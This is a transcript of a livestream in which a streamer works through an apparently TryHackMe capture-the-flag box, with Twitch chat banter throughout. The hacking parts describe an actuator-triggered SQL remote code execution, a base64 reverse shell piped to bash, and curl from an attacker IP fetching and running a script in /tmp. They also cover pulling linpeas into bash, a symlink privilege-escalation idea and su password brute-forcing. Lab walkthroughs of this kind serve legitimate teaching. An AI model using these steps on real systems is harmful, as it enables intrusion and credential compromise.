what this is doing is it's triggering an SQL query. It's triggering this particular this particular query to execute whenever a new database connection is triggered, either by restart or changing the number of database connections and reinitializing it or whatever. Me copy, me paste, me no read. Listen, where does it say post request in here? Where the fuck does it say post request? I don't see a post request anywhere. It says post right here. Where does it say post request to actuator restart? People are now linking me to like fucking basic HTTP documentation. Fuck you guys, okay? Fuck you. You know what? It's gonna be, I will add you. I will give you an ad. Zato, thank you for the first time Prime. Welcome to the Alhaz Red Team, my friend. Thank you so much. One Netrunner with the 5 months of Prime. Welcome back to the Alhaz Red Team, my friend. Thank you so much. 081, thank you for the follow. I'm doing my... Listen, chat, that I will acknowledge that this is the second time this week I've fucked up basic HTTP. This is a fluke, okay? This is a fluke. It's just a bad week for my comprehension of how HTTP works. Okay? It's a bad week for that. None of this would happen if you use Zap, by the way. Yeah, except there'd be 50 other fucking problems. And oh, by the way, like, part of your fucking Firefox window is taken up by this stupid fucking UI nobody uses. A fluke 2 times in a row is not a fluke, it's not as a standard. I don't think you know what a standard is, Maticus Maximus. Standards are hard. Figuring out what a standard is hard. You guys are mean, okay? Rude. You are rude. You're like the movie Mean Girls, except not funny. If you want to get mad at somebody, get mad at the person who made Hack Tools light mode. And I can't figure out how to change it back. Oh, it's right here. Dark. Perfect. Oh, GoPro is in this. Oh. Okay. Let's copy the reverse shell.
Hey, listen.
What now? I just did that technique. I just changed it to dark mode. You're welcome. Why did that fucking change? Excuse me? What is Burp doing? Burp. What are you doing, sir? Well, Burp just took all the spaces out. What is happening? Is this some burp shit? What is happening here? I'll just paste it in. I know we can escape. I'm just going to try and see if I can just change it right here and then paste it in. I'm not sure what Burp was doing there. Keyboard is not broken. It works fine. I do need a new one, but it's working fine at the moment. Sometimes it double types my S's. Yeah, it's doing the... Okay, we'll just escape the single quote. Thusly. I don't know why Burp is doing that. And let's see if we get a reverse shell that way. And if that doesn't work, I have other options. Okay, we send this. We get a 400. 400 bad request. So it doesn't like the way that this is parsed. this gonna work? Okay, that works. Let's try... let's just try putting this into... Just paste this out.
Hey, listen.
What, Zaphida? What is it? You can't use double quotes at break. Oh, that's true. We are in JSON. Yeah, good call. It's all right. We'll do it this way. Base 64. Tac W0. Paste that in. Base 64-D. Pipe that into bash. I think that should probably work. Okay. Let me just double check. Let's do that really quickly. Echo. Bam. Base 64-D. Pipe that into bash. And it's hanging, which means we probably have a reverse shell. We do. Goody. So our reverse shell does work. Okay. So now we can send a post request with a new line at the end to okay, we're restarting. We should get a reverse shell. Maybe. That does not appear to have worked. That does not appear to have worked, chat. What was the TAC W0? That was to keep it from wrapping onto the next line. I just wanted it to print out the base 64 all on one line. Are you a hacker influencer? I wouldn't say I'm an influencer, but I am a hacker. That is the case. I'm a hacker when people aren't sending me a basic HTTP documentation. I owed Zaphida a Mald? Why do I owe Where did Zaphida redeem a Mald? I don't see Zaphida redeeming a Mald. Zaphida! I just saw it! Zaphida, and then you tell me to listen, and then you don't even tell me what to listen for. You're like... I don't even have like a yelling... I'm actually losing my voice because of all the yelling I have to do with chat. I'm just going to give you an ad. You know what? I'm just going to give you an ad and Mauled off his stream. That's what's happening. That's what's happening now. We're doing an ad. I just got here, no. Okay, let's try... Let's do this again, but let's do it... Cthulhu.sh.
A hunter must hunt.
Let's try it this way. We'll try and just host a back over here, and we do Curl. 10. .2.54.81. Cthulhu.sh. Bash. Cthulhu.sh. Try that, I guess. Idea for the next one: if you laugh, you lose. If Alhazred loses, he has to wear cutoffs. Don't give Helen of Tor ideas, okay? Kevin Adeline, thank you for the follow. Maticus Maximus bringing Myrtle the Turtle into the cult. Welcome to the Alhazred team. Alright, so we did this. Let's do actuator restart. We should get a curl. We do. Except we get a 404. It 404'd. But we do get a curl. Where did I save it? It's right here! What the hell are you talking about? It interpreted the semicolon, did it? Oh, it did. There is a semicolon there. Huh. Okay, I guess maybe we'll just have to do this in separate commands. Let's just do it in separate commands then. It's a little sloppy, but whatever. How does yeah, I know how HTTP works. Fuck you, Tibbs. Okay, we should get a we get a 200 okay. All right, there we go. And then we bash Cthulhu.sh. Come on, you cuck. Damn it. Curl doesn't save. Oh, you're right. Curl doesn't save. You're absolutely right. I'm an idiot. Is it curl? Is it tech? I'm an idiot. Yeah, thank you for the reminder. Apparently, I can't remember how anything works today. Don't start linking me basic curl documentation.
What are you doing, step bro?
It's been a long day, and by a long day, I mean I'm inexplicably tired for no reason. 10.2.54.81. It might have something to do with the fact that I was up late last night finishing my 100% of Elden Ring. That could possibly be the problem. Attack H. Write output to a file. Why does it need to be capital O? I think it writes the whole HTTP request if I don't do it that way. If I remember correctly. That's really what I had to look up, if it was lowercase or capital O. I just... Taco test. Could not resolve host test. What am I getting wrong now? It is lowercase. Fucking goddamn it, chat. That's an ad. That's another... I can't even do an ad again. It's gonna be an ad every time chat tells me something stupid. I'm not tolerating anything from chat today. Chat has been unruly today. And I need to keep them in check. I need to display dominance. .2.54.81 Cthulhu.sh attack lowercase o Cthulhu.sh. Let's just restart the server. There we go. Send. Okay. All right, so we're getting. Hopefully that worked. And then we can bash Cthulhu.sh. Come on, I believe in you. I believe in you. Oh my god. Why are we not getting a reverse shell? Chat's not as bad as when they made you reboot your your PC. I'm still not happy about that. I typed reboot tac H, and apparently reboot is the only command for which tac H does not work. File not executable? It doesn't matter. It doesn't matter. I had it execute through bash. See? I did bash Cthulhu.sh. Let's try it one other way. Let's try writing it to /dev/shm Cthulhu.sh. It might be not executable. I think it's fine. We'll try that. We'll try temp, actually. Let's do temp. Temp is writable. We'll write it to a definite location. And then we will execute it from that location. Bin bash temp Cthulhu.sh. Wait, we didn't actually submit that last one, did we? We have to download it and write it. And I don't think we ever actually executed it. Getting ahead of myself here. We should get another request. We do. So it should have written. We'll do /bin/bash /temp /Cthulhu.sh. Send.
Hackerman.
I'm in. All right, we got it. That took way too long. Why don't you use wget? Because because we knew that curl was on the server, but wget isn't always on the server. Kevin Adeline, thank you for the follow. Where did my... I don't want to play StarCraft. Go back to FTL. Clearly needs to update his burp. It's burp is... I don't think burp is out of date. It might be a little out of date. I just update it with the Kali repository. Let's do Stream Raiders really quickly before we proceed. Okay, does anybody have any questions about how all of that worked? Any questions about that before we continue? Still lots to go on this box. We just got a shell just now. Yeah, how does fucking Vinkel? I'm gonna get water. I'm gonna get what he just post requests. Whew. Whew! I like how fucking Tiberius is in here. Having never done any box that's a medium or harder and, like, avoiding Hack the Box as if it had the plague on his stream. And yet he comes into my chat and is like, well, I understand how HTTP works. Won't even do Osiris on stream. Imagine the beta, like, listen, not everyone can be an absolute Sigma male like I am and just dive right into Osiris, okay?
Bro, 5 months already, D.
What was that? Now I'm thinking about that video I saw yesterday. Hang on. I saw it on R Funny of all places, and even funnier, it was funny. Or even weirder, it was funny. Hang on, let me find it. It was very funny, if I can find it. I could just open up my texts. God damn it. We're mad about a lot of things. Chat is always mad. When are we going to do the WinCorp series again? Do we want to do the WinCorp series again? We certainly can. Maybe we could just speedrun the WinCorp series one day. Okay, what was that funny thing that I sent? This one, yeah. Commercial. My God, I can't find it. What the fuck? Okay, well, now we're down a rabbit hole. I can't find it. Can you show Kat to stream? I miss her. Azriel, I believe she is napping in my bedroom. If she comes in, I will show her off. Okay, well, I can't find, Wait, what did I go miss? Oh, you didn't miss anything. I was just saying things that are objectively true. Just objectively true things about various people. Does Star have kitten mittens? She absolutely does. She absolutely does. Owen codes with the 6 months. God, 5 months. Like it feels amazing when I'm seeing people like who have subscribed to me for like 16 months, and I'm like, have I really been doing this that long? All right, so we're in as nobody. Well, I think the reason that we couldn't make it work earlier is that we couldn't write to this directory. We're in the root directory here, so we had to specify a specific directory to be inside. There's our Cthulhu.sh, written by nobody. Let's cd/home. We are the John Smith user. There is a John Smith user. We do see Tomcat logs. Let's which Python 3? Python 3-c. Import pty.spawn. Bin bash. stty raw minus echo. Okay, good enough right now. User.text, so we cannot write that. What was the foothold? There was a foothold one. There was a foothold flag. Is that in var? It's in www maybe? Nope. Where is find root tag name foothold? We're trying to find one of the first flag. Yeah, we'll try to sue John Smith here in a second. That's definitely something we're going to want to try to do. I'm just trying to find the first flag first. Opt. Don't expose .git to internet. That is wise. Yes, wise words. Where is TryHackMe? There you are. Haha, get fucked, crypto shill. I'm gonna go watch Jonathan Data. He knows what posts are. I'm so sorry to lose you, Hunter. Especially because of your name. I really enjoy your name, Hunter. Let's try sue John Smith. We have like 4 different passwords for him. It didn't work. Let's try pretty secure key store password. That's probably not right, is it? Nope. And we have one more password to try, but I don't have high hopes for it. If AD had more HTTP, Al would be good at it. Yeah, and that, like, look at this guy talking all kind of shit. All kinds of shit. When as soon as he runs into Active Directory, he's like, "What? How Kerberos work?" Which is fair because even the developers of Kerberos don't know how Kerberos works. I'm convinced there's nobody alive who truly understands Kerberos from top to bottom. I am absolutely convinced that this is the case. I'm noticing these Tomcat logs. That's definitely something we want to check out. We saw those before. Let's check this out. So these are fairly small files. Except there's one that's large. So we'll try this one first, because this one is larger than the others. So I'm seeing something running on 8888. Is there another application running on 8888, I'm wondering? Let's go ahead and take a look-see at that. We'll put that into our notes to take a look at it. Kerberos works? Yeah, Kerberos is pretty good. As far as authentication mechanisms go, Kerberos is pretty good. Does it have its exploitable things? Absolutely. But all things will be exploitable in one way or another. Kerberos is infinitely better than NTLM authentication, which preceded it. We could look at tomcatusers.xml. We're just seeing a bunch of crap here of when the machine got started up again. I hack AD all the time with SMB and Responder. That's how you do it, my man. Primal MK, thanks for the 6 months. That's how I started, just by firing up Responder, dude. I don't do that anymore. Not for red teams. If I was on regular internal penetration tests, absolutely, I'd be respondering I'd be respondering all day, every day, baby. But for a red team, Responder is not all that terribly useful. It's too loud. Ominous, bringing us 5 new cult initiates. Alone Cello, I guess. Tessel RX. 740 II, MSEC, Poop Feast. Welcome to the All Has Red team, my friends. Thanks for supporting the stream. What's Responder? Responder is a Python tool for doing basically DNS poisoning. It's not really DNS. I'm just summing it up. Basically, DNS poisoning in a network to redirect all authentication requests through your machine, which is exploitable in a variety of ways. Responder is just the enabler for the exploitation. So we're not seeing anything of particular interest there, I don't think, other than possibly a server running on 8888. We might want to look at that. Okay, so this is basically the same thing. Okay, let's look at 8888. Curl, localhost 8888. Connection refused. So it looks like it's not running now. Nope. We're just seeing 2280. Nothing there. But notably, root is writing these logs. So this probably is the vector to get from John Smith. We probably need to get to the John Smith user first. I guess we'll probably have to try linpeas, huh? Let's try set SUID binaries. Let's try groups. Set you find root tac name or perm 4000. Let's find set UID binaries, see if there's anything. Wow, okay. There's a lot of snap ones. We get that a lot though. Su ping mount. These all look normal. All of these look normal. So no set UID. Let's do linpeas. And we're not doing the thorough checks. I regret the thorough checks. Mount. Grep SHM. Okay, we're good. Let us... Let's get rid of this. Let's kill this. CD into opt. Privilege escalation. LinPeas. Pull down linpeas.sh, pipe it into bash. I keep forgetting my fucking IP address. .2.54.81. linpeas.sh. Pipe it into bash. See what we get there. The Anarchist with the 8 months. Welcome back to the All Has Red team, my friend. Thanks for supporting the stream. Do you know the off-limit flags for Responder with the no OSCP rules? All of them? I don't think you're allowed to do spoofing in Responder. I mean, I think you can use Responder. I think you can use Responder on the OSCP exam to, like, if, like, you could force a machine to authenticate to an arbitrary machine on the network, you could use Responder in that instance. What's the difference between /temp and dev/shm? Well, they're both cleared upon upon system reboot, so there essentially is no difference. I just like to use dev/shm because if that's what IPSec used, and it burrowed its way deep down into my cerebrum, and it hasn't left yet. We're seeing Tomcat logs. Those Tomcat logs are definitely something to look at. Probably when we're the John Smith user. Hey, what's the difference between a post request and a post request? I'm Twitch chat. I'm very funny. So sudo is vulnerable, but we don't care about that. We do see this password in environment variables. That's interesting. But we already had that password. Nothing there. Not seeing anything of particular interest at the moment. And missed way too many streams? That's okay, Regis. The VODs are always there, my friend. SHM is shared memory. I know that's what SHM stands for. The salt goodness. I'm just it's just banter. It's just banter with chat. We do a little trolling on this stream. Is Wall supposed to have the set group ID bit set? No. Sudo. Why skip sudo exploit? Because it's probably not intended. We're trying to find the intended way to root, not use more recent exploits that were discovered since the box has been created to kind of cheat. That's not really cheating, but it's kind of cheating. I would just use polkit to or pwnekit to root every single box if I could do that, or if I wanted to do that. We see some Tomcat files in temp. Nothing. We didn't really see anything, did we? Did anybody see anything that I missed? GetText.sh is normal. Nefarious with the 5 months. Thank you so much for supporting the stream, my friend. Thanks for welcome back to the All Has Red team. See embargo DC. I don't GetText.sh is normal. That's on. I'm pretty sure that exists on my Kali machine too. Password reuse. We tried that. We could try Peace By. Let's try Peace By. I'm trying to think of what things we haven't tried yet. Peace By 64S. Okay, see if Peace By gives us anything of actual interest. We can check. Lin Peas would have. Well, if there's anything in the cron tab, we'll see it here. We'll give it a minute. Kind of stumped here, chat. We're kind of stumped here. There was nothing else in opt. There were those log files, but the only thing that we saw was some kind of server running on 8888, but doesn't seem to be running now. Can we look at the SSH keys? We don't have access to see them. P. Monterrazzo, thank you for the follow. It doesn't look like there are any cron jobs, my friends. What about the redirect? The redirect doesn't matter. We're past the web server now. We have remote code execution. But besides, we bypassed that anyways already. That is a solved problem. But we don't have any permissions. And I'm scratching my head on how to get to... how to get to root from here. We want to get to the John Smith user first. Let's do find root tech user John Smith.
A hunter must hunt.
I want to see every file owned by John Smith that I can read. And that did not take long because there weren't many. JZ1999 bringing MacGyver into the cult. Welcome to the All Has Red team, my friend. Thank you so much for supporting the stream. Thank you. Welcome back. Welcome in, MacGyver. Good to see you. Capabilities? Linpeas would have caught that, I would think. Get cap. Attack R for recursive. Yeah, I remember seeing this. This is normal. Nothing there. Huh. We tried all of his passwords, didn't we? You can read his flag? No, we can't. I already looked. I'm gonna look real stupid if I'm wrong. But I don't think I am. Yeah. Only John Smith can read his flag here. We can read the directory it's in, but we cannot read the flag. Maybe it's just root again. Sue root. Surprisingly, that didn't work. The secret codes did not work.
Say the magic word. Please! God damn it! Hate this hacker crap.
Calling it.
Alas.
I imagine that right now you're feeling a bit like Alice. Tumbling down the rabbit hole?
It's only readable by John Smith.
What are you doing, step bro?
We're trying to figure this out, Nethogs. Nethogs. I'm gonna call you Nethogs because that's what your name looks like it is, even though I know it's wrong. Search for John inside Tomcat logs. Yeah, we could try that. It might be the Tom. Did the box just die on me? I suspect the box just died. It did. Okay. You can. What are you doing? Step broing me. Step bro me. Go ahead. I'll even do it for you.
What are you doing, step bro?
I forgot to continue the machine. It'll start back up. What ideas do we have, chat?
What are you doing, step bro?
Why are you the way that you are?
Have we tried all the passwords? We did try all the passwords. I'm noting that these passwords are basically the same. Are we supposed to guess a password? Do we think? That can't be right. That would be too stupid. Did you check the config? I did not check Tomcat config. I guess I can try that. Okay. What are those Tomcat logs? We already looked at them. They look like just the logs for when Tomcat starts up. Is the box started up yet? 10.10.200.30 now. It's just taking a second to spin up because this is Java we're talking about. You did say the logs get written by root. The logs do get written by root. That is correct. Doesn't system... You said no crom jobs, but doesn't system D have some similar mechanism? What do you mean by that? You mean looking at services? I mean, I guess we could try. Have you tried Log4j? Don't think it would work here. I don't think that this tiny application is using Log4j. Why is this taking so long to spin up? Can you write a script to get privet? I don't know. I don't know what you mean by that. We ran linps. We'll try when we get back into the box. We're waiting for the box to spin back up again. Come on, dude. How long is this gonna take? This box takes forever to spin up. It's a Hello World application. Failed to connect. Great. Let's just turn off burp. Maybe it's not in the scope or something? That can't be right. Is my VPN fucked up? Let's just reconnect to the VPN, I suppose. Okay. Okay, so we can reach the application again. So the first thing we need to do... we need to post to actuator restart. We need to post this. This is the remote code execution. What was that? What was that page that? This one. I'm just gonna mark this down in the notes. This page got us remote code execution. So we send a post actuator env, and then we have to send post actuator restart. Just reminding myself how to do this. Let's turn intercept on. Let's add the target to the scope. 10.10. What is it? 10.10.200.30. Okay, is it going to intercept now? No, because I am probably not going to burp. There we go. Now is it going to intercept? It is. Okay, so let's go to actuator env. And then there was that arbitrary HTTP header that we had to include. Jesus, this box is cancer? I would not say it's cancer. I like it so far. I'm a little stuck on the Privesk, but what else is new? It's just not anything... It's not anything super obvious. I've ruled out all the obvious things. Let's send this to repeater. It's definitely out of the ordinary. It's going to be something that's out of the ordinary. Change request method. We can try to get requested first. There we go. We get the environment variables. Perfect. And then we can change request method. Okay. And we can post our remote code execution. JSON here. This has to be application JSON. This needs to be curl http://10.2.54.81/Cthulhu.sh tac lowercase o temp Cthulhu.sh send. Okay, that's good. And now we send a post request to actuator restart. We should get a request here. We do. Now if we go do this, we go back. /bin/bash temp Cthulhu.sh. Send. Now we do restart. And we should get a reverse shell. It did work. In bash. stty raw minus echo. Export term equals x term. 256 color. Okay. All right. Someone was saying something about system D. CD, etc, system D. Is it in system? Where are the system CTL services? Where are they stored? It's probably not in network or user, so I would guess system. We'll look there first. We got Spring service here. Exec start root start contact start tomcat.sh. Permission denied, so we cannot read that. I don't know. What do you guys want me to look at? System CTL list timers. System CTL. Is it status? Spring? Oh, this is interesting. Look. FT home John Smith to this log file. That's very interesting. So that's how those log files are getting made. What's that one in 4 minutes? I have no idea what list timers even does. I have no idea what we're even looking at here. Is this epic time? Yeah. That's epic time. So it's writing to a file by the... Epic time is the amount of seconds that have passed since, I don't know, sometime in the 1970s. It's pretty common to see it in this field. January 1st, 1970. Okay, yeah, that's easy enough to remember.
A hunter must hunt.
Well, I can tell... I know how this is exploitable. I know how this is exploitable, potentially. We could potentially predict, since it's epic time, we could potentially predict the file name. We'd have to make a whole bunch of files, but we could potentially predict the file name, and make a whole bunch of symlinks, for all of the possible seconds that it, we make a whole bunch of symlinks, and we could symlink them to somewhere else, and we'd essentially have arbitrary file write as root. The question is, what would you write? Because this is a puzzler. This is a puzzler, friends. Is that line from Bloodborne? It is from Bloodborne. It is from Bloodborne. This is definitely a hard box. It is a hard box. It's Cthulhu Cthursday. But the thing is, we cannot write to the John Smith folder. So I anticipate that this is leading to arbitrary file write as root. But the problem is, I don't think that we have write access to that. I think we need to get to the John Smith user. We need to somehow get to this user. Because we do not have write access to this directory. We do not have write access to Tomcat logs. If we had write access to Tomcat logs, we could do arbitrary file write as root. I don't know what we would write. But that comes second. Do you want a hint yet? No. Let me think. It's a puzzler. I don't want to just... I want to focus on... I want you guys to see me struggle. Part of the point of this stream is for you guys to see me struggle. We've tried all the normal pathways to root. I don't see anything that is obvious. So it has to be something non-obvious. I might just have to intuit something. Only 13337 with the first time indoctrination into the cult. Welcome, my friend. Welcome to the All Has Red team. King Kong 4444, thanks for the follow. That's the try harder mindset. No, I'm doing my best. I'm trying to... I don't want to just succumb and get a hint just yet. I am intrigued by this box. I'm not frustrated by this box. This box is interesting. This is the difference between... If we're going to make an Elden Ring comparison, this is the difference between the Melania boss fight and the triple fucking crystalline soldier boss fight. One of the boss fights is... Both boss fights are extremely difficult, but one is extremely difficult in, like, an enjoyable manner, and one is extremely difficult in an extremely bullshit, fuckface, Scarlet, an extremely bullshit, makes me want to fucking pull my hair out, way. Like, there's a difference between those two difficulties. This boss fight, this box is interesting. I am intrigued. I'm just trying to think of methods to Privesk that I haven't thought of before. I want to mark this down, because this seems like something that's going to be interesting. Those log files are... This has been added by the user. So this is something that I imagine is intended. Right, then you have speedrunners. Speedrunners have already beaten the game legitimately. They're just doing it... like, you have to do it... You have to kind of cheese the bosses in order to go faster. Does T even work in a System D script? I don't even know why you'd use T in a System D script. That seems a little odd to me, unless someone is viewing the output, but what's notable here, what I'm noting here is that this sudo also operates on this T. So this T is running as root. So these and we can tell that because these Tomcat logs are being written as root. See? Root. You always want to pay attention to files that are owned by root in weird places. This is intentional by the developer, by the box developer. And the most common way to exploit files being written by root is with symlinks. So we can do an arbitrary file write somewhere. I don't know what we'd write, but we're not there yet because we need to be able to write to this directory, and we need to be the John Smith user. So we need to get to the John Smith user. I agree, Herkfilla, that we need to somehow become John Smith. We absolutely do. The question is how we do that. Maybe Stream Raiders would help. Let's do Stream Raiders real quick. I like your idea of the prediction attack on the timestamp, but it seems convoluted. It does, but this box is a hard box. This is a hard box. He has multiple passwords that conform to the same syntax. So, if we look at these passwords, I mentioned this before, and it's still bothering me because I'm a red teamer and predicting people's credentials is what I do. Notice these credentials here. These credentials are the same. So we can anticipate that they were written by the same person. And since John Smith is the only user on the server, I would expect that this is his, that he is the one that is, in the meta narrative of this box, is creating is creating these passwords. So maybe we have to guess a password. Is it really that simple? Just guessing a password? Sue John Smith. No. It's not a suffix. I think he has dummy key store password, which we only saw in the Git repo, and he has this one, which is the real password. So I would guess it's going to be something like, there'll be a word in here. Ooh, I might be just totally tumbling down a rabbit hole here. I haven't seen anything like this in a CTF before, but I've seen it in real life, because this is how people make passwords in real life. I saw it. I'm in particular thinking about this kind of stuff because I ran a password reset phishing scam, and I saw what people changed their passwords to, dude. Like, one person's password was name of company 23, and he changed it to name of company 24. Like, people do that stupid shit in their passwords. Like that kind of stupid shit is super real life. So if they put this in, I would say that's giga real life. This is how people come up with passwords. They have like common phrases that they use, and they like change it, they tweak it a little bit. The question is, what server did they use? Maybe Spring Password? What's the host name of the box? Spring Password. Let's try... Its key store is capitalized. Let's try pretty secure Spring Password. It's worth a try, at least. Fuck. Okay, we'll need a quicker way to do this. I think there's a tool called SueCrack, which will do this. Cracking local user accounts via wordless brute forcing. Perfect. But I need like a standalone binary. Is there a standalone binary for SueCrack? Or is it just a shell script? That would be even better. Make isn't even installed on here, I would imagine, is it? No. So we couldn't, like... Oh, God. Well, I thought this might work. I just want like a bash script. Is there like a bash script to brute force SU password? Boom. Please be a bash script. Perfect. So this is going to be... Okay, we'll do this. We'll work with this. Brute force is a selected user using binary Sioux and has passwords null password, username, reverse username. No, we want a word list. We're going to have to generate a word list. I have a favorite actress name. Everyone's got their own ways of remembering passwords that they need to remember. Mine are almost always, like, long movie quotes. Like, I have really long passwords. You would not want to try and brute force one of my passwords. We'll use this. This seems good. Let's go to raw. Okay. SUBF. wget http://10.2.54.81. What is it? subf.sh. There we go. Chmod plus x subf.sh. Okay. So we want to put the username and then a word list. And that's it. So we need to generate a word list. We could probably just use RockU, but it's too long. We could just use common, but all the words need to be capitalized. Why don't we... so... I could just, like, write a Python script to capitalize the first letter in the entire word list. Why don't we just... Before we do that, why don't we just RockU... cat... user... share... word lists... RockU.text... grep. How do you grep for a regular expression? What's the option in grep to do a regular expression? It's tac capital E. Yeah, okay. Tac capital E. Okay, so we need capital letter regular expression. We're Googling. All the Googling today. Regular expression to match capital letters. A to Z. Any single uppercase, so it's just capital A to Z. So start of string, capital A to Z. Like that. Oh, no, it has to be like this. Like that? So this will match anything that matches a... Let's just pipe this into less and make sure it's doing what I want it to do. Yeah. So these all start with capital letters, right? Let's start here, and if it doesn't work, we'll start here, and if it doesn't work, I'll take a much smaller word list, and I'll do a Python script to change them all the first letters to capital letters. I'm just trying to go easy this time. Crack.list. We'll try it this way first. Because normally when you're trying to crack something in a CTF, RockU.text usually is a good one to work with. Home. This is kind of dumb, but if I try to make all of the word lists in RockU.text, all of the words in RockU.text capitalized, we'll get a 14. It's never going to crack. It's going to take forever. I figure this will be a shorter list. And plus, I might be just completely down a rabbit hole here, so I don't want to spend too much time on it if it's not gonna bear fruit. Did that work the way that I'd hoped? It seems like it did. So we do have a problem here where this is all of the shit. So this is all of the it's not going to be totally capitalized. It's only a capitalized word. It's not full capital letters. So we will get capital letters in here, but it's going to take too long. So what's the regex for matching ones that... there needs to be another caret? Oh, we're doing a regex inside of a regex. So like this. And A to Z. So it has to be lowercase. And then it was plus. It was a plus sign. Like that. Less. That did not work. That does not work. So it's... I don't think that second caret is supposed to be there. That means the start of the string. So it's going to start with a capital letter, and then the next letter is going to be... What is the plus sign in a regex again? It's just plus sign? Yeah, this is what we want. This is what we want right here. So that works. That's what we want. We'll do that. I don't think I wanted to include numbers. His are just words. And again, this might just be a total, like, down a rabbit hole sort of situation. So I don't really want to spend too much time on it. Let's pull down crack.list. Okay, so now we can subf.sh. Tac U is John Smith. Tac P, or is it tac W? It's tac W. Tac W, crack.s8, crack.list. Okay, so it... I mean... We're probably going to have to try other things. We're kind of in a hard situation here because I think we might want to spawn another reverse shell. Yeah, we could modify the script to indicate progress in some way. I mean, this we're definitely going to want to do something like this. We're definitely going to want to... Okay. Does it not? Does this not have the? It doesn't have the TAC E. A lot of netcats don't have the TAC E this time. Or don't have the TAC E anymore. Let's use... Let's just do this one. And we put that at the end. Okay. So if we run an ampersand at the end, it starts it in the background. So we can have another reverse shell, except it did not work. Fuck. God damn it. Let's just try this bash reverse shell again. Okay, I need to set my TTY. STTY-A 36115. Is it 115? Okay. What is that application you're pulling those shells from? That is the Hack Tools browser extension available on Firefox and Chrome. Okay, did we get a reverse shell? Okay, good. That did not work like I'd hoped. Alright, it doesn't work. Fuck. Well, I don't know what to do, chat. I don't just want to sit here and wait for this to finish, because it's probably just a rabbit hole. But I can't get another reverse shell because the web server is hanging. You might want to edit the script like they said. Which nano Sue BF. Sing user. Okay, let's do this. Let's do count equals 0. And then
Hey, listen.
what? Yes, Neen Pone, what? Did you add the password, prefix, and suffix? I did not. Good point. I did not do that. I'm an idiot. But I definitely do need to do that. Let me finish adding this count first. Can you do count plus plus in bash? Anybody know? Probably not. Count plus equals 1. Hey, listen is so expensive. No, it's not. And second of all, if it wasn't that expensive, people would just spam it all the time. And that's going to get annoying real quick for you and for me. If count... Oh, it's dollar count. If dollar count... I keep trying to type in Python. How do I do an if statement in fucking Bash? Count equals dollar count plus 1 equals dollar count plus 1. There you go. If count mod 20 equals 0. How do I do a fucking if statement in Bash? Oh, God. So it has to be in braces. Or brackets, excuse me. So it has to be, the whole thing has to be in brackets? Like this? And we can put this in parentheses, just in case. And then we do a then. Echo. Dollar count. Hopefully that works. 150 is the count of people in the stream about to learn how... I know, I don't like Bash's syntax at all. It's going to complain a ton. Let's try that. But before we continue with that, we have to... Okay, now we need to actually make the password list. We didn't actually make the password list before. We need to... What's the best way to make the password list? Do we need to use the Python script after all? I think we might have to Python script after all, friends. Oh, I know, I got a better idea. We can just Vim it. We can Vim. Vim subf.sh. Or not this one. Vim cracklist.list. So now we can go, through the magic of Vim, we can go %s to do a find and replace. Replace the beginning of the string with, what was the beginning of this? Pretty secure. I did it wrong. What was it? Oh, it's G. Has to be G. Oh my god, I'm such a big brain. I'm such a gargantuan, big, beefy Chad brain, chat. Except Vim is having a hard time with how big this file is. my god, I'm huge. Oh my god, what a wrinkly brain. This is what you're here, chat, okay? The Vim magic. And we'll do the end of the string. And we'll put in password 123 with a period at the end. This is probably a total dalliance. Let's make sure it looked right. Yep, it does look right. Look at that, chat. Look at how beautiful it is, chat. It's so beautiful. No Python script required. Fucking gargantuan gigabrain. Time to make Vim teaching? I'm not that good at Vim. I just know how to do a find and replace. We're still learning plenty of stuff, even if we're in a rabbit hole. Hange, CPP, Hidden, Francis, BTW, Sheer Force, and Sphinx. Thank you for the follow. We're hammering away at it, chat. We're gonna get there. I believe in us. Okay? As long as we're learning, I'm okay with not finishing the box, necessarily. That is the wrong crack.list. That is the correct one. Alright, let's see all the bash errors. You guys ready to see all these bash errors that we're about to get? Yep. God. Alright, unexpected token. Oh, the fiend. We forgot the phi. Yeah, we forgot the phi. Thank you. Bash is so annoying when it comes to loops. Let's do nano su brute force.sh. Of all of the programming languages that I'm tangentially aware of, Bash has by far the worst syntax for an if statement. Like, it's god-awful. Like, look how verbose this is. What is the point of the then? Just have a brackets. Or braces, excuse me. Yeah, we need the phi. God. Now, okay. So whoever told me to change that was full of shit. Because that didn't work. Missing parentheses. I'm not missing parentheses. It had two... Where did it have two parentheses? There's only one parentheses here. Where? It needs to be two? Why? Why does it need to be two? Oh my god, I hate Bash's fucking syntax. Oh my god, this sucks. This is Rust tier. It doesn't seem like adding... Do I need maybe 3 of them? You may need a space on the inside. Oh my god. What a fucking disastrous syntax. Imagine making a programming language like this. I am listening. Remove the dollar from... No, the dollar has to be there. Where? What dollar do I remove? Where? What dollar do I remove? Right here? Okay. I'm trusting you, chat. Big shock still doesn't work. Big shock still doesn't work, chat. We're still getting syntax errors. Okay, how do we do bash increment of variable? Holy fucking shit. This is so painful. Why is this so fucking painful? Who wrote this? Oh my god, this is a fucking disaster. What is this syntax? Oh my god, this is a fucking... Whoever thought this up should be shot. Like, this is egregious. Like, what is this syntax? This is fucking disastrous. I don't make a whole lot of bash scripts, in fairness, but this is fucking disastrous. Dollar, parentheses, parentheses, maybe spaces, we don't know. This is such a disaster. Well, we have a difference error now. We've made progress. We've made a different error. Or if it's a syntax error near unexpected token. Oh, so there doesn't need to be a dollar in that then, right? This is so fucking shitty. Why is Bash so bad? Oh my god. I bitch about Rust and then I come over here to Bash and this is like... Bash is the guy looking awkwardly meme every time I complain about Rust's syntax. Is it like this? Why 2 zeros? Oh my god, this is... So, there doesn't need to be a braces then? 2 parentheses. So it needs to be dollar count. Why? It seemed like it didn't like that before. Well, it's executing. Command not found. This is... Listen. This is hard. But this is what... This is not good, but this is what we call progress. Okay? This is what progress is. In Bash. Jesus Christ. If... Okay, so it's got to be dollar count then. What do you mean not found? I regret so much trying to do this.
Hey, listen.
What? I listen. Everybody is telling me different things. Literally everybody is telling me different crap. Like, if you could consolidate your ideas into one thing, the tac equals might work. I like that idea. Everyone is saying different things. This is disastrous. Tac equals 0. It's saying count, like, command not found. You have spaces. Am I not allowed to have spaces? Oh my god. What a fucking disaster of a language. Holy shit. This sucks ass. Wow. Okay. I took the spaces out. Where are the spaces? This is absolutely disastrous of a language. This is sucky. What spaces? Like right here? Like that? It just really doesn't like those spaces, huh? People told me to put the spaces in. Now they're telling me to take the spaces out. I hate this language. Oh my god. What syntax error now? Token is 0. What the fuck does that even mean? Now people are telling me to put the spaces back. I can't win, dude.
Hey, listen.
